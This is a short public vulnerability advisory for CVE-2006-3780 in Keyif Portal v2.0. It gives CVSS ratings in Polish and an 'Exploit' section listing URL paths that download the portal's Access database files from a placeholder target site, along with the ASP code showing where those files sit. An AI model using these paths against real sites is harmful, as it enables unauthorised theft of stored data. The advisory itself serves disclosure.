Keyif Portal v2.0 - Microsoft Access Driver ( MDB ) Download

2006.07.26
Credit: x0r0n
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2006-3780
CWE: CWE-Other


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

title : Keyif Portal v2.0 - Microsoft Access Driver ( MDB ) Download - script site : http://www.keyifweb.com/ - Discovered : xoron - Cont@ct : x0r0n (at) hotmail (dot) com [email concealed] - Exploit : http://www.target.com/[path]/A9S7G6ASD790/ANKET/anket.mdb http://www.target.com/[path]/A9S7G6ASD790/HABER/keyifweb.mdb http://www.target.com/[path]/A9S7G6ASD790/ASP/download.mdb http://www.target.com/[path]/A9S7G6ASD790/SAYAC/aktif.mdb - Code: SAYAC Veri_yolu = Server.MapPath("database/A9S7G6ASD790/SAYAC/aktif.mdb") Bcumle = "DRIVER={Microsoft Access Driver (*.mdb)};DBQ=" & Veri_yolu ----- ASP Sur.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/A9S7G6ASD790/ASP/download.mdb") ----- ANKET vt_yol = server.mappath("database/A9S7G6ASD790/ANKET/anket.mdb") Set bag = CreateObject("ADODB.Connection") ----- DOWNLOAD Set Sur = Server.CreateObject("ADODB.Connection") Sur.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/A9S7G6ASD790/ASP/download.mdb") - XORON - Cyber-Warrior.Org /// special thanx R3D4C!D :)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top